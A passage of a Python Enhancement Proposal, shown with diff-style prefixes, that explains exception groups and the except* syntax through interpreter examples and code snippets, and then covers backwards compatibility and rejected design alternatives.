+>>> raise ExceptionGroup("two", [f(2), eg])
+ + Exception Group Traceback (most recent call last):
+ |   File "<stdin>", line 1, in <module>
+ | ExceptionGroup: two (2 sub-exceptions)
+ +-+---------------- 1 ----------------
+   | Traceback (most recent call last):
+   |   File "<stdin>", line 3, in f
+   | ValueError: 2
+   +---------------- 2 ----------------
+   | Exception Group Traceback (most recent call last):
+   |   File "<stdin>", line 2, in <module>
+   | ExceptionGroup: one (1 sub-exception)
+   +-+---------------- 1 ----------------
+     | Traceback (most recent call last):
+     |   File "<stdin>", line 3, in f
+     | ValueError: 1
+     +------------------------------------
+>>>
+
+
+
+
+

Handling Exception Groups

+

We expect that when programs catch and handle exception groups, they will +typically either query to check if it has leaf exceptions for which some +condition holds (using subgroup or split) or format the exception +(using the traceback module’s methods).

+

It is less likely to be useful to iterate over the individual leaf exceptions. +To see why, suppose that an application caught an exception group raised by +an asyncio.gather() call. At this stage, the context for each specific +exception is lost. Any recovery for this exception should have been performed +before it was grouped with other exceptions [10]. +Furthermore, the application is likely to react in the same way to any number +of instances of a certain exception type, so it is more likely that we will +want to know whether eg.subgroup(T) is None or not, than we are to be +interested in the number of Ts in eg.

+
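
For example, a simple presence check (Python 3.11+):

+
eg = ExceptionGroup("msg", [TypeError(1), TypeError(2), ValueError(3)])
+if eg.subgroup(TypeError) is not None:  # "is there at least one TypeError?"
+    print("handle the TypeErrors as a group")
+
+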

However, there are situations where it is necessary to inspect the +individual leaf exceptions. For example, suppose that we have an +exception group eg and that we want to log the OSErrors that have a +specific error code and reraise everything else. We can do this by passing +a function with side effects to subgroup, as follows:

+
def log_and_ignore_ENOENT(err):
+    if isinstance(err, OSError) and err.errno == ENOENT:
+        log(err)
+        return False
+    else:
+        return True
+
+try:
+    . . .
+except ExceptionGroup as eg:
+    eg = eg.subgroup(log_and_ignore_ENOENT)
+    if eg is not None:
+        raise eg
+
+
+

In the previous example, when log_and_ignore_ENOENT is invoked on a leaf +exception, only part of this exception’s traceback is accessible – the part +referenced from its __traceback__ field. If we need the full traceback, +we need to look at the concatenation of the tracebacks of the exceptions on +the path from the root to this leaf. We can get that with direct iteration, +recursively, as follows:

+
def leaf_generator(exc, tbs=None):
+    if tbs is None:
+        tbs = []
+
+    tbs.append(exc.__traceback__)
+    if isinstance(exc, BaseExceptionGroup):
+        for e in exc.exceptions:
+            yield from leaf_generator(e, tbs)
+    else:
+        # exc is a leaf exception and its traceback
+        # is the concatenation of the traceback
+        # segments in tbs.
+
+        # Note: the list returned (tbs) is reused in each iteration
+        # through the generator. Make a copy if your use case holds
+        # on to it beyond the current iteration or mutates its contents.
+
+        yield exc, tbs
+    tbs.pop()
+
+
+

We can then process the full tracebacks of the leaf exceptions:

+
>>> import traceback
+>>>
+>>> def g(v):
+...     try:
+...         raise ValueError(v)
+...     except Exception as e:
+...         return e
+...
+>>> def f():
+...     raise ExceptionGroup("eg", [g(1), g(2)])
+...
+>>> try:
+...     f()
+... except BaseException as e:
+...     eg = e
+...
+>>> for (i, (exc, tbs)) in enumerate(leaf_generator(eg)):
+...     print(f"\n=== Exception #{i+1}:")
+...     traceback.print_exception(exc)
+...     print(f"The complete traceback for Exception #{i+1}:")
+...     for tb in tbs:
+...         traceback.print_tb(tb)
+...
+
+=== Exception #1:
+Traceback (most recent call last):
+  File "<stdin>", line 3, in g
+ValueError: 1
+The complete traceback for Exception #1:
+  File "<stdin>", line 2, in <module>
+  File "<stdin>", line 2, in f
+  File "<stdin>", line 3, in g
+
+=== Exception #2:
+Traceback (most recent call last):
+  File "<stdin>", line 3, in g
+ValueError: 2
+The complete traceback for Exception #2:
+  File "<stdin>", line 2, in <module>
+  File "<stdin>", line 2, in f
+  File "<stdin>", line 3, in g
+>>>
+
+
+
+
+
+

except*

+

We are proposing to introduce a new variant of the try..except syntax to +simplify working with exception groups. The * symbol indicates that multiple +exceptions can be handled by each except* clause:

+
try:
+    ...
+except* SpamError:
+    ...
+except* FooError as e:
+    ...
+except* (BarError, BazError) as e:
+    ...
+
+
+

In a traditional try-except statement there is only one exception to handle, +so the body of at most one except clause executes; the first one that matches +the exception. With the new syntax, an except* clause can match a subgroup +of the exception group that was raised, while the remaining part is matched +by following except* clauses. In other words, a single exception group can +cause several except* clauses to execute, but each such clause executes at +most once (for all matching exceptions from the group) and each exception is +either handled by exactly one clause (the first one that matches its type) +or is reraised at the end. The manner in which each exception is handled by +a try-except* block is independent of any other exceptions in the group.

+

For example, suppose that the body of the try block above raises +eg = ExceptionGroup('msg', [FooError(1), FooError(2), BazError()]). +The except* clauses are evaluated in order by calling split on the +unhandled exception group, which is initially equal to eg and then shrinks +as exceptions are matched and extracted from it. In the first except* clause, +unhandled.split(SpamError) returns (None, unhandled) so the body of this +block is not executed and unhandled is unchanged. For the second block, +unhandled.split(FooError) returns a non-trivial split (match, rest) with +match = ExceptionGroup('msg', [FooError(1), FooError(2)]) +and rest = ExceptionGroup('msg', [BazError()]). The body of this except* +block is executed, with the value of e and sys.exc_info() set to match. +Then, unhandled is set to rest. +Finally, the third block matches the remaining exception so it is executed +with e and sys.exc_info() set to ExceptionGroup('msg', [BazError()]).

+
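
The walkthrough above can be run on Python 3.11+; SpamError, FooError, BarError and BazError are stand-in exception classes defined here only for the example:

+
class SpamError(Exception): pass
+class FooError(Exception): pass
+class BarError(Exception): pass
+class BazError(Exception): pass
+
+try:
+    raise ExceptionGroup('msg', [FooError(1), FooError(2), BazError()])
+except* SpamError:
+    print('never')        # no SpamError in the group
+except* FooError as e:
+    print(f'foo: {e!r}')  # foo: ExceptionGroup('msg', [FooError(1), FooError(2)])
+except* (BarError, BazError) as e:
+    print(f'rest: {e!r}') # rest: ExceptionGroup('msg', [BazError()])
+
+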

Exceptions are matched using a subclass check. For example:

+
try:
+    low_level_os_operation()
+except* OSError as eg:
+    for e in eg.exceptions:
+        print(type(e).__name__)
+
+
+

could output:

+
BlockingIOError
+ConnectionRefusedError
+OSError
+InterruptedError
+BlockingIOError
+
+
+

The order of except* clauses is significant just like with the regular +try..except:

+
>>> try:
+...     raise ExceptionGroup("problem", [BlockingIOError()])
+... except* OSError as e:   # Would catch the error
+...     print(repr(e))
+... except* BlockingIOError: # Would never run
+...     print('never')
+...
+ExceptionGroup('problem', [BlockingIOError()])
+
+
+
+

Recursive Matching

+

The matching of except* clauses against an exception group is performed +recursively, using the split() method:

+
>>> try:
+...     raise ExceptionGroup(
+...         "eg",
+...         [
+...             ValueError('a'),
+...             TypeError('b'),
+...             ExceptionGroup(
+...                 "nested",
+...                 [TypeError('c'), KeyError('d')])
+...         ]
+...     )
+... except* TypeError as e1:
+...     print(f'e1 = {e1!r}')
+... except* Exception as e2:
+...     print(f'e2 = {e2!r}')
+...
+e1 = ExceptionGroup('eg', [TypeError('b'), ExceptionGroup('nested', [TypeError('c')])])
+e2 = ExceptionGroup('eg', [ValueError('a'), ExceptionGroup('nested', [KeyError('d')])])
+>>>
+
+
+
+
+

Unmatched Exceptions

+

If not all exceptions in an exception group were matched by the except* +clauses, the remaining part of the group is propagated on:

+
>>> try:
+...     try:
+...         raise ExceptionGroup(
+...             "msg", [
+...                  ValueError('a'), TypeError('b'),
+...                  TypeError('c'), KeyError('e')
+...             ]
+...         )
+...     except* ValueError as e:
+...         print(f'got some ValueErrors: {e!r}')
+...     except* TypeError as e:
+...         print(f'got some TypeErrors: {e!r}')
+... except ExceptionGroup as e:
+...     print(f'propagated: {e!r}')
+...
+got some ValueErrors: ExceptionGroup('msg', [ValueError('a')])
+got some TypeErrors: ExceptionGroup('msg', [TypeError('b'), TypeError('c')])
+propagated: ExceptionGroup('msg', [KeyError('e')])
+>>>
+
+
+
+
+

Naked Exceptions

+

If the exception raised inside the try body is not of type ExceptionGroup +or BaseExceptionGroup, we call it a naked exception. If its type matches +one of the except* clauses, it is caught and wrapped by an ExceptionGroup +(or BaseExceptionGroup if it is not an Exception subclass) with an empty +message string. This is to make the type of e consistent and statically known:

+
>>> try:
+...     raise BlockingIOError
+... except* OSError as e:
+...     print(repr(e))
+...
+ExceptionGroup('', [BlockingIOError()])
+
+
+

However, if a naked exception is not caught, it propagates in its original +naked form:

+
>>> try:
+...     try:
+...         raise ValueError(12)
+...     except* TypeError as e:
+...         print('never')
+... except ValueError as e:
+...     print(f'caught ValueError: {e!r}')
+...
+caught ValueError: ValueError(12)
+>>>
+
+
+
+
+

Raising exceptions in an except* block

+

In a traditional except block, there are two ways to raise exceptions: +raise e to explicitly raise an exception object e, or naked raise to +reraise the ‘current exception’. When e is the current exception, the two +forms are not equivalent because a reraise does not add the current frame to +the stack:

+
def foo():                           | def foo():
+    try:                             |     try:
+        1 / 0                        |         1 / 0
+    except ZeroDivisionError as e:   |     except ZeroDivisionError:
+        raise e                      |         raise
+                                     |
+foo()                                | foo()
+                                     |
+Traceback (most recent call last):   | Traceback (most recent call last):
+  File "/Users/guido/a.py", line 7   |   File "/Users/guido/b.py", line 7
+   foo()                             |     foo()
+  File "/Users/guido/a.py", line 5   |   File "/Users/guido/b.py", line 3
+   raise e                           |     1/0
+  File "/Users/guido/a.py", line 3   | ZeroDivisionError: division by zero
+   1/0                               |
+ZeroDivisionError: division by zero  |
+
+
+

This holds for exception groups as well, but the situation is now more complex +because there can be exceptions raised and reraised from multiple except* +clauses, as well as unhandled exceptions that need to propagate. +The interpreter needs to combine all those exceptions into a result, and +raise that.

+

The reraised exceptions and the unhandled exceptions are subgroups of the +original group, and share its metadata (cause, context, traceback). +On the other hand, each of the explicitly raised exceptions has its own +metadata - the traceback contains the line from which it was raised, its +cause is whatever it may have been explicitly chained to, and its context is the +value of sys.exc_info() in the except* clause of the raise.

+

In the aggregated exception group, the reraised and unhandled exceptions have +the same relative structure as in the original exception, as if they were split +off together in one subgroup call. For example, in the snippet below the +inner try-except* block raises an ExceptionGroup that contains all +ValueErrors and TypeErrors merged back into the same shape they had in +the original ExceptionGroup:

+
>>> try:
+...     try:
+...         raise ExceptionGroup(
+...             "eg",
+...             [
+...                 ValueError(1),
+...                 TypeError(2),
+...                 OSError(3),
+...                 ExceptionGroup(
+...                     "nested",
+...                     [OSError(4), TypeError(5), ValueError(6)])
+...             ]
+...         )
+...     except* ValueError as e:
+...         print(f'*ValueError: {e!r}')
+...         raise
+...     except* OSError as e:
+...         print(f'*OSError: {e!r}')
+... except ExceptionGroup as e:
+...     print(repr(e))
+...
+*ValueError: ExceptionGroup('eg', [ValueError(1), ExceptionGroup('nested', [ValueError(6)])])
+*OSError: ExceptionGroup('eg', [OSError(3), ExceptionGroup('nested', [OSError(4)])])
+ExceptionGroup('eg', [ValueError(1), TypeError(2), ExceptionGroup('nested', [TypeError(5), ValueError(6)])])
+>>>
+
+
+

When exceptions are raised explicitly, they are independent of the original +exception group, and cannot be merged with it (they have their own cause, +context and traceback). Instead, they are combined into a new ExceptionGroup +(or BaseExceptionGroup), which also contains the reraised/unhandled +subgroup described above.

+

In the following example, the ValueErrors were raised so they are in their +own ExceptionGroup, while the OSErrors were reraised so they were +merged with the unhandled TypeErrors.

+
>>> try:
+...     raise ExceptionGroup(
+...         "eg",
+...         [
+...             ValueError(1),
+...             TypeError(2),
+...             OSError(3),
+...             ExceptionGroup(
+...                 "nested",
+...                 [OSError(4), TypeError(5), ValueError(6)])
+...         ]
+...     )
+... except* ValueError as e:
+...     print(f'*ValueError: {e!r}')
+...     raise e
+... except* OSError as e:
+...     print(f'*OSError: {e!r}')
+...     raise
+...
+*ValueError: ExceptionGroup('eg', [ValueError(1), ExceptionGroup('nested', [ValueError(6)])])
+*OSError: ExceptionGroup('eg', [OSError(3), ExceptionGroup('nested', [OSError(4)])])
+  | ExceptionGroup:  (2 sub-exceptions)
+  +-+---------------- 1 ----------------
+    | Exception Group Traceback (most recent call last):
+    |   File "<stdin>", line 15, in <module>
+    |   File "<stdin>", line 2, in <module>
+    | ExceptionGroup: eg (2 sub-exceptions)
+    +-+---------------- 1 ----------------
+      | ValueError: 1
+      +---------------- 2 ----------------
+      | ExceptionGroup: nested (1 sub-exception)
+      +-+---------------- 1 ----------------
+        | ValueError: 6
+        +------------------------------------
+    +---------------- 2 ----------------
+    | Exception Group Traceback (most recent call last):
+    |   File "<stdin>", line 2, in <module>
+    | ExceptionGroup: eg (3 sub-exceptions)
+    +-+---------------- 1 ----------------
+      | TypeError: 2
+      +---------------- 2 ----------------
+      | OSError: 3
+      +---------------- 3 ----------------
+      | ExceptionGroup: nested (2 sub-exceptions)
+      +-+---------------- 1 ----------------
+        | OSError: 4
+        +---------------- 2 ----------------
+        | TypeError: 5
+        +------------------------------------
+>>>
+
+
+
+
+

Chaining

+

Explicitly raised exception groups are chained as with any exceptions. The +following example shows how part of ExceptionGroup “one” became the +context for ExceptionGroup “two”, while the other part was combined with +it into the new ExceptionGroup.

+
>>> try:
+...     raise ExceptionGroup("one", [ValueError('a'), TypeError('b')])
+... except* ValueError:
+...     raise ExceptionGroup("two", [KeyError('x'), KeyError('y')])
+...
+  | ExceptionGroup:  (2 sub-exceptions)
+  +-+---------------- 1 ----------------
+    | Exception Group Traceback (most recent call last):
+    |   File "<stdin>", line 2, in <module>
+    | ExceptionGroup: one (1 sub-exception)
+    +-+---------------- 1 ----------------
+      | ValueError: a
+      +------------------------------------
+    |
+    | During handling of the above exception, another exception occurred:
+    |
+    | Exception Group Traceback (most recent call last):
+    |   File "<stdin>", line 4, in <module>
+    | ExceptionGroup: two (2 sub-exceptions)
+    +-+---------------- 1 ----------------
+      | KeyError: 'x'
+      +---------------- 2 ----------------
+      | KeyError: 'y'
+      +------------------------------------
+    +---------------- 2 ----------------
+    | Exception Group Traceback (most recent call last):
+    |   File "<stdin>", line 2, in <module>
+    | ExceptionGroup: one (1 sub-exception)
+    +-+---------------- 1 ----------------
+      | TypeError: b
+      +------------------------------------
+>>>
+
+
+
+
+

Raising New Exceptions

+

In the previous examples the explicit raises were of the exceptions that +were caught, so for completeness we show a new exception being raised, with +chaining:

+
>>> try:
+...     raise TypeError('bad type')
+... except* TypeError as e:
+...     raise ValueError('bad value') from e
+...
+  | ExceptionGroup:  (1 sub-exception)
+  +-+---------------- 1 ----------------
+    | Traceback (most recent call last):
+    |   File "<stdin>", line 2, in <module>
+    | TypeError: bad type
+    +------------------------------------
+
+The above exception was the direct cause of the following exception:
+
+Traceback (most recent call last):
+  File "<stdin>", line 4, in <module>
+ValueError: bad value
+>>>
+
+
+

Note that exceptions raised in one except* clause are not eligible to match +other clauses from the same try statement:

+
>>> try:
+...     raise TypeError(1)
+... except* TypeError:
+...     raise ValueError(2) from None  # <- not caught in the next clause
+... except* ValueError:
+...     print('never')
+...
+Traceback (most recent call last):
+  File "<stdin>", line 4, in <module>
+ValueError: 2
+>>>
+
+
+

Raising a new instance of a naked exception does not cause this exception to +be wrapped by an exception group. Rather, the exception is raised as is, and +if it needs to be combined with other propagated exceptions, it becomes a +direct child of the new exception group created for that:

+
>>> try:
+...     raise ExceptionGroup("eg", [ValueError('a')])
+... except* ValueError:
+...     raise KeyError('x')
+...
+  | ExceptionGroup:  (1 sub-exception)
+  +-+---------------- 1 ----------------
+    | Exception Group Traceback (most recent call last):
+    |   File "<stdin>", line 2, in <module>
+    | ExceptionGroup: eg (1 sub-exception)
+    +-+---------------- 1 ----------------
+      | ValueError: a
+      +------------------------------------
+    |
+    | During handling of the above exception, another exception occurred:
+    |
+    | Traceback (most recent call last):
+    |   File "<stdin>", line 4, in <module>
+    | KeyError: 'x'
+    +------------------------------------
+>>>
+>>> try:
+...     raise ExceptionGroup("eg", [ValueError('a'), TypeError('b')])
+... except* ValueError:
+...     raise KeyError('x')
+...
+  | ExceptionGroup:  (2 sub-exceptions)
+  +-+---------------- 1 ----------------
+    | Exception Group Traceback (most recent call last):
+    |   File "<stdin>", line 2, in <module>
+    | ExceptionGroup: eg (1 sub-exception)
+    +-+---------------- 1 ----------------
+      | ValueError: a
+      +------------------------------------
+    |
+    | During handling of the above exception, another exception occurred:
+    |
+    | Traceback (most recent call last):
+    |   File "<stdin>", line 4, in <module>
+    | KeyError: 'x'
+    +---------------- 2 ----------------
+    | Exception Group Traceback (most recent call last):
+    |   File "<stdin>", line 2, in <module>
+    | ExceptionGroup: eg (1 sub-exception)
+    +-+---------------- 1 ----------------
+      | TypeError: b
+      +------------------------------------
+>>>
+
+
+

Finally, as an example of how the proposed semantics can help us work +effectively with exception groups, the following code ignores all EPIPE +OS errors, while letting all other exceptions propagate.

+
try:
+    low_level_os_operation()
+except* OSError as errors:
+    exc = errors.subgroup(lambda e: e.errno != errno.EPIPE)
+    if exc is not None:
+        raise exc from None
+
+
+
+
+

Caught Exception Objects

+

It is important to point out that the exception group bound to e in an +except* clause is an ephemeral object. Raising it via raise or +raise e will not cause changes to the overall shape of the original +exception group. Any modifications to e will likely be lost:

+
>>> eg = ExceptionGroup("eg", [TypeError(12)])
+>>> eg.foo = 'foo'
+>>> try:
+...     raise eg
+... except* TypeError as e:
+...     e.foo = 'bar'
+... #   ^----------- ``e`` is an ephemeral object that might get
+>>> #                      destroyed after the ``except*`` clause.
+>>> eg.foo
+'foo'
+
+
+
+
+

Forbidden Combinations

+

It is not possible to use both traditional except blocks and the new +except* clauses in the same try statement. The following is a +SyntaxError:

+
try:
+    ...
+except ValueError:
+    pass
+except* CancelledError:  # <- SyntaxError:
+    pass                 #    combining ``except`` and ``except*``
+                         #    is prohibited
+
+
+

It is possible to catch the ExceptionGroup and BaseExceptionGroup +types with except, but not with except* because the latter is +ambiguous:

+
try:
+    ...
+except ExceptionGroup:  # <- This works
+    pass
+
+try:
+    ...
+except* ExceptionGroup:  # <- Runtime error
+    pass
+
+try:
+    ...
+except* (TypeError, ExceptionGroup):  # <- Runtime error
+    pass
+
+
+

An empty “match anything” except* block is not supported as its meaning may +be confusing:

+
try:
+    ...
+except*:   # <- SyntaxError
+    pass
+
+
+

continue, break, and return are disallowed in except* clauses, +causing a SyntaxError. This is because the exceptions in an +ExceptionGroup are assumed to be independent, and the presence or absence +of one of them should not impact handling of the others, as could happen if we +allow an except* clause to change the way control flows through other +clauses.
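
+
A short sketch of the restriction (Python 3.11+; the exact message wording
is CPython's and may change between versions):

+
for x in range(3):
+    try:
+        pass
+    except* ValueError:
+        break  # SyntaxError: 'break', 'continue' and 'return'
+               # cannot appear in an except* block
+
+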

+
+
+
+
+

Backwards Compatibility

+

Backwards compatibility was a requirement of our design, and the changes we +propose in this PEP will not break any existing code:

+
    +
  • The addition of the new builtin exception types ExceptionGroup and +BaseExceptionGroup does not impact existing programs. The way that +existing exceptions are handled and displayed does not change in any way.
  • +
  • The behaviour of except is unchanged so existing code will continue to work. +Programs will only be impacted by the changes proposed in this PEP once they +begin to use exception groups and except*.
  • +
  • An important concern was that except Exception: will continue to catch +almost all exceptions, and by making ExceptionGroup extend Exception +we ensured that this will be the case. BaseExceptionGroups will not be +caught, which is appropriate because they include exceptions that would not +have been caught by except Exception (see the sketch after this list).
  • +
+
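
A minimal sketch (Python 3.11+) of this guarantee: ExceptionGroup is caught
by except Exception, while BaseExceptionGroup is not:

+
try:
+    raise ExceptionGroup("eg", [ValueError('a')])
+except Exception as e:
+    print(type(e).__name__)  # ExceptionGroup
+
+try:
+    raise BaseExceptionGroup("beg", [KeyboardInterrupt()])
+except Exception:
+    print('never reached')
+except BaseException as e:
+    print(type(e).__name__)  # BaseExceptionGroup
+
+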

Once programs begin to use these features, there will be migration issues to +consider:

+
    +
  • An except T: clause that wraps code which is now potentially raising +an exception group may need to become except* T:, and its body may +need to be updated. This means that raising an exception group is an +API-breaking change and will likely be done in new APIs rather than +added to existing ones.
  • +
  • Libraries that need to support older Python versions will not be able to use +except* or raise exception groups.
  • +
+
+
+

How to Teach This

+

Exception groups and except* will be documented as part of the language +standard. Libraries that raise exception groups such as asyncio will need +to specify this in their documentation and clarify which API calls need to be +wrapped with try-except* rather than try-except.

+
+
+

Reference Implementation

+

We developed these concepts (and the examples for this PEP) with +the help of the reference implementation [11].

+

It has the builtin ExceptionGroup along with the changes to the traceback +formatting code, in addition to the grammar, compiler and interpreter changes +required to support except*. BaseExceptionGroup will be added +soon.

+

Two opcodes were added: one implements the exception type match check via +ExceptionGroup.split(), and the other is used at the end of a try-except +construct to merge all unhandled, raised and reraised exceptions (if any). +The raised/reraised exceptions are collected in a list on the runtime stack. +For this purpose, the body of each except* clause is wrapped in a traditional +try-except which captures any exceptions raised. Both raised and reraised +exceptions are collected in the same list. When the time comes to merge them +into a result, the raised and reraised exceptions are distinguished by comparing +their metadata fields (context, cause, traceback) with those of the originally +raised exception. As mentioned above, the reraised exceptions have the same +metadata as the original, while the raised ones do not.
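
+
As a rough illustration of that metadata test (a simplified model for
exposition, not CPython's actual internals), a reraised exception is
recognisable because these fields still match those of the originally
raised exception:

+
def has_original_metadata(exc, original):
+    # True for a reraised exception, False for a newly raised one
+    return (exc.__context__ is original.__context__
+            and exc.__cause__ is original.__cause__
+            and exc.__traceback__ is original.__traceback__)
+
+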

+
+
+

Rejected Ideas

+
+

Make Exception Groups Iterable

+

We considered making exception groups iterable, so that list(eg) would +produce a flattened list of the leaf exceptions contained in the group. +We decided that this would not be a sound API, because the metadata +(cause, context and traceback) of the individual exceptions in a group is +incomplete and this could create problems.

+

Furthermore, as we explained in the Handling Exception Groups section, we +find it unlikely that iteration over leaf exceptions will have many use cases. +We did, however, provide there the code for a traversal algorithm that +correctly constructs each leaf exceptions’ metadata. If it does turn out to +be useful in practice, we can in the future add that utility to the standard +library or even make exception groups iterable.
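
+
For reference, a minimal sketch (a hypothetical helper, not part of this
proposal) of such a flattening traversal; it yields the leaf exceptions
while discarding exactly the per-leaf metadata whose incompleteness makes
list(eg) unsound:

+
def leaf_exceptions(exc):
+    if isinstance(exc, BaseExceptionGroup):
+        for sub in exc.exceptions:
+            yield from leaf_exceptions(sub)
+    else:
+        yield exc
+
+eg = ExceptionGroup(
+    "eg", [ValueError('a'), ExceptionGroup("inner", [TypeError('b')])])
+print([type(e).__name__ for e in leaf_exceptions(eg)])  # ['ValueError', 'TypeError']
+
+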

+
+
+

Make ExceptionGroup Extend BaseException

+

We considered making ExceptionGroup subclass only BaseException, +and not Exception. The rationale of this was that we expect exception +groups to be used in a deliberate manner where they are needed, and raised +only by APIs that are specifically designed and documented to do so. In +this context, an ExceptionGroup escaping from an API that is not +intended to raise one is a bug, and we wanted to give it “fatal error” +status so that except Exception will not inadvertently swallow it. +This would have been consistent with the way except T: does not catch +exception groups that contain T for all other types, and would help +contain ExceptionGroups to the parts of the program in which they are +supposed to appear. However, it was clear from the public discussion that +T=Exception is a special case, and there are developers who feel strongly +that except Exception: should catch “almost everything”, including +exception groups. This is why we decided to make ExceptionGroup a +subclass of Exception.

+
+
+

Make it Impossible to Wrap BaseExceptions in an Exception Group

+

A consequence of the decision to make ExceptionGroup extend +Exception is that ExceptionGroup should not wrap BaseExceptions +like KeyboardInterrupt, as they are not currently caught by +except Exception:. We considered the option of simply making it +impossible to wrap BaseExceptions, but eventually decided to make +it possible through the BaseExceptionGroup type, which extends +BaseException rather than Exception. Making this possible +adds flexibility to the language and leaves it for the programmer to +weigh the benefit of wrapping BaseExceptions rather than propagating +them in their naked form while discarding any other exceptions.
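
+
A small demo (Python 3.11+) of the resulting split: ExceptionGroup refuses
to wrap a BaseException that is not an Exception, while BaseExceptionGroup
accepts it:

+
try:
+    ExceptionGroup("eg", [KeyboardInterrupt()])
+except TypeError as e:
+    print(e)  # Cannot nest BaseExceptions in an ExceptionGroup
+
+beg = BaseExceptionGroup("beg", [KeyboardInterrupt()])
+print(type(beg).__name__)  # BaseExceptionGroup
+
+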

+
+
+

Traceback Representation

+

We considered options for adapting the traceback data structure to represent +trees, but it became apparent that a traceback tree is not meaningful once +separated from the exceptions it refers to. While a simple-path traceback can +be attached to any exception by a with_traceback() call, it is hard to +imagine a case where it makes sense to assign a traceback tree to an exception +group. Furthermore, a useful display of the traceback includes information +about the nested exceptions. For these reasons we decided that it is best to +leave the traceback mechanism as it is and modify the traceback display code.

+
+
+

Extend except to Handle Exception Groups

+

We considered extending the semantics of except to handle +exception groups, instead of introducing except*. There were two +backwards compatibility concerns with this. The first is the type of the +caught exception. Consider this example:

+
try:
+    . . .
+except OSError as err:
+    if err.errno != ENOENT:
+        raise
+
+
+

If the value assigned to err is an exception group containing all of +the OSErrors that were raised, then the attribute access err.errno +no longer works. So we would need to execute the body of the except +clause multiple times, once for each exception in the group. However, this +too is a potentially breaking change because at the moment we write except +clauses with the knowledge that they are only executed once. If there is +a non-idempotent operation there, such as releasing a resource, the +repetition could be harmful.

+

The idea of making except iterate over the leaf exceptions of an exception +group is at the heart of an alternative proposal to this PEP by Nathaniel J. Smith, +and the discussion about that proposal further elaborates on the pitfalls of +changing except semantics in a mature language like Python, as well as +deviating from the semantics that parallel constructs have in other languages.

+

Another option that came up in the public discussion was to add except*, +but also make except treat ExceptionGroups as a special case. +except would then do something along the lines of extracting one exception +of matching type from the group in order to handle it (while discarding all +the other exceptions in the group). The motivation behind +these suggestions was to make the adoption of exception groups safer, in that +except T catches Ts that are wrapped in exception groups. We decided +that such an approach adds considerable complexity to the semantics of the +language without making it more powerful. Even if it would make the adoption +of exception groups slightly easier (which is not at all obvious), these are +not the semantics we would like to have in the long term.

+
+
+

A New except Alternative

+

We considered introducing a new keyword (such as catch) which can be used +to handle both naked exceptions and exception groups. Its semantics would +be the same as those of except* when catching an exception group, but +it would not wrap a naked exception to create an exception group. This +would have been part of a long term plan to replace except by catch, +but we decided that deprecating except in favour of an enhanced keyword +would be too confusing for users at this time, so it is more appropriate +to introduce the except* syntax for exception groups while except +continues to be used for simple exceptions.

+
+
+

Applying an except* Clause on One Exception at a Time

+

We explained above that it is unsafe to execute an except clause in +existing code more than once, because the code may not be idempotent. +We considered doing this in the new except* clauses, +where the backwards compatibility considerations do not exist. +The idea is to always execute an except* clause on a single exception, +possibly executing the same clause multiple times when it matches multiple +exceptions. We decided instead to execute each except* clause at most +once, giving it an exception group that contains all matching exceptions. The +reason for this decision was the observation that when a program needs to know +the particular context of an exception it is handling, the exception is +handled before it is grouped and raised together with other exceptions.

+

For example, KeyError is an exception that typically relates to a certain +operation. Any recovery code would be local to the place where the error +occurred, and would use the traditional except:

+
try:
+    dct[key]
+except KeyError:
+    # handle the exception
+
+
+

It is unlikely that asyncio users would want to do something like this:

+
try:
+    async with asyncio.TaskGroup() as g:
+        g.create_task(task1); g.create_task(task2)
+except* KeyError:
+    # handling KeyError here is meaningless, there's
+    # no context to do anything with it but to log it.
+
+
+

When a program handles a collection of exceptions that were aggregated into +an exception group, it would not typically attempt to recover from any +particular failed operation, but will rather use the types of the errors to +determine how they should impact the program’s control flow or what logging +or cleanup is required. This decision is likely to be the same whether the group +contains a single instance or multiple instances of something like a KeyboardInterrupt +or asyncio.CancelledError. Therefore, it is more convenient to handle all +exceptions matching an except* at once. If it does turn out to be necessary, +the handler can inspect the exception group and process the individual +exceptions in it.
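
+
A minimal sketch (Python 3.11+) of that last resort; note that in general
eg.exceptions may contain nested groups, which this simple loop does not
descend into:

+
try:
+    raise ExceptionGroup("eg", [KeyError('a'), KeyError('b')])
+except* KeyError as eg:
+    # eg contains only the matching exceptions
+    for exc in eg.exceptions:
+        print('missing key:', exc.args[0])
+
+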

+
+
+

Not Matching Naked Exceptions in except*

+

We considered the option of making except* T match only exception groups +that contain Ts, but not naked Ts. To see why we thought this would +not be a desirable feature, return to the distinction in the previous paragraph +between operation errors and control flow exceptions. If we don’t know whether +we should expect naked exceptions or exception groups from the body of a +try block, then we’re not in the position of handling operation errors. +Rather, we are likely calling a fairly generic function and will be handling +errors to make control flow decisions. We are likely to do the same thing +whether we catch a naked exception of type T or an exception group +with one or more Ts. Therefore, the burden of having to explicitly handle +both is not likely to have semantic benefit.

+

If it does turn out to be necessary to make the distinction, it is always +possible to nest in the try-except* clause an additional try-except +clause which intercepts and handles a naked exception before the except* +clause has a chance to wrap it in an exception group. In this case the +overhead of specifying both is not additional burden - we really do need to +write a separate code block to handle each case:

+
try:
+    try:
+        ...
+    except SomeError:
+        # handle the naked exception
+except* SomeError:
+    # handle the exception group
+
+
+
+
+

Allow mixing except: and except*: in the same try

+

This option was rejected because it adds complexity without adding useful +semantics. Presumably the intention would be that an except T: block handles +only naked exceptions of type T, while except* T: handles T in +exception groups. We already discussed above why this is unlikely +to be useful in practice, and if it is needed then the nested try-except +block can be used instead to achieve the same result.

+
+
+

try* instead of except*

+

Since either all or none of the clauses of a try construct are except*, +we considered changing the syntax of the try instead of all the except* +clauses. We rejected this because it would be less obvious. The fact that we +are handling exception groups of T rather than only naked Ts should be +specified in the same place where we state T.

+
+
+

Alternative syntax options

+

Alternatives to the except* syntax were evaluated in a discussion on python-dev, and it was suggested to use +except group. Upon careful evaluation this was rejected because the following +would be ambiguous, as it is currently valid syntax where group is interpreted +as a callable. The same is true for any valid identifier.

+
try:
+   ...
+except group (T1, T2):
+   ...
+
+
+
+
+
+

Programming Without ‘except *’

+

Consider the following simple example of the except* syntax (pretending +Trio natively supported this proposal):

+
try:
+    async with trio.open_nursery() as nursery:
+        # Make two concurrent calls to child()
+        nursery.start_soon(child)
+        nursery.start_soon(child)
+except* ValueError:
+    pass
+
+
+

Here is how this code would look in Python 3.9:

+
def handle_ValueError(exc):
+    if isinstance(exc, ValueError):
+        return None
+    else:
+        return exc   # reraise exc
+
+with MultiError.catch(handle_ValueError):
+    async with trio.open_nursery() as nursery:
+        # Make two concurrent calls to child()
+        nursery.start_soon(child)
+        nursery.start_soon(child)
+
+
+

